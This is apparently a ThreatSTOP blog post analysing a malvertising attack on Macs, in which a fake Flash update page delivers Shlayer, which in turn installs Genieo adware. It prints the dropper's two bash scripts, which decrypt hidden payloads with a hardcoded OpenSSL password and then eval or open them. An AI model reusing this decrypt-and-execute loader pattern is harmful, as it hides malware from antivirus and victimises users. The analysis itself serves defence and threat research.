It’s no secret that the pervasiveness of ad networks has greatly diminished the web browsing experience in recent years. With this has also come criminals and other miscreants who are using the drive for web advertising revenue to deliver malware.
While doing commodity web surfing, I noticed a news website redirected to www[.]temper[.]world (was only registered 5 days when observed in an attack) and attempting to phish with warnings about Flash being out of date. As I hadn’t looked at Mac malware recently, I decided to take a look. Clicking through would download Shalyer (SHA256: 70a2250c44f1e45948169513c390c3abdfc84d806d06d535ac91c49b1d4bbec0, no VT detections) which would then download Genieo (SHA256: 0e8d54fdc43615989da4d4697a6dd8b40f54aa2001a71bc6c57a9d7a01732cec, 19/57 VT detections) which is classified as AdWare/PUA. I classify it as malware since it uses overt deception to phish users to install.
Shlayer, in this case, uses two encrypted files that need to be decrypted by script which generates the installer for Genieo. The password is hardcoded and doing open-source research shows this person has been using the same password for about 3 months (at least). The scripts were in the form of:
#!/bin/bash
cd "$(dirname "$BASH_SOURCE")"
fileDir="$(dirname "$(pwd -P)")"
username=$(whoami)
mkdir -p /tmp/"$username"
cp "$fileDir"/Resources/paramsJson.json /tmp/"${USER}"/paramsJson.json
cd "$fileDir"/Resources/
rm -rf /tmp/"$username"/appicon.icns
cp AppIcon.icns /tmp/"$username"/appicon.icns
eval "$(openssl enc -base64 -d -aes-256-cbc -nosalt -pass pass:6341145384 <"$fileDir"/Resources/enc)"
--
#!/bin/bash
tmp_path="$(mktemp -d /tmp/XXXXXXXXX)"
openssl enc -base64 -d -aes-256-cbc -nosalt -out "$tmp_path/installer.zip" -pass pass:6341145384 < enc2
unzip "$tmp_path"/installer.zip -d "$tmp_path" > /dev/null 2>&1
echo "$tmp_path"/Installer.app
open -a "$tmp_path"/Installer.app --args "s" "$session_guid" "$volume_name"
As both files are encrypted, there is nothing for AV to detect until decryption begins. What is also interesting is that the Player.dmg file also references another newly registered domain jurisdiction[.]world that doesn’t appear to be part of the chain of attack.
This highlights the importance of using DNS to block threats. Not only is this malware delivered from one of the new gTLDs that doesn’t have a good reputation, it’s a newly registered domain which is suspicious, and the domain could be quickly identified as bad and blocked. Blocking the underlying IP address would cause great collateral damage as they are hosted at Akamai. In addition, it is possible to block newly registered and newly observed domains which would also block such attacks.
ThreatSTOP users are protected against this threat in our TS Curated – Phishing - Domains ad TS Originated – Phishing – Domains targets.
Ready to try ThreatSTOP in your network? Want an expert-led demo to see how it works?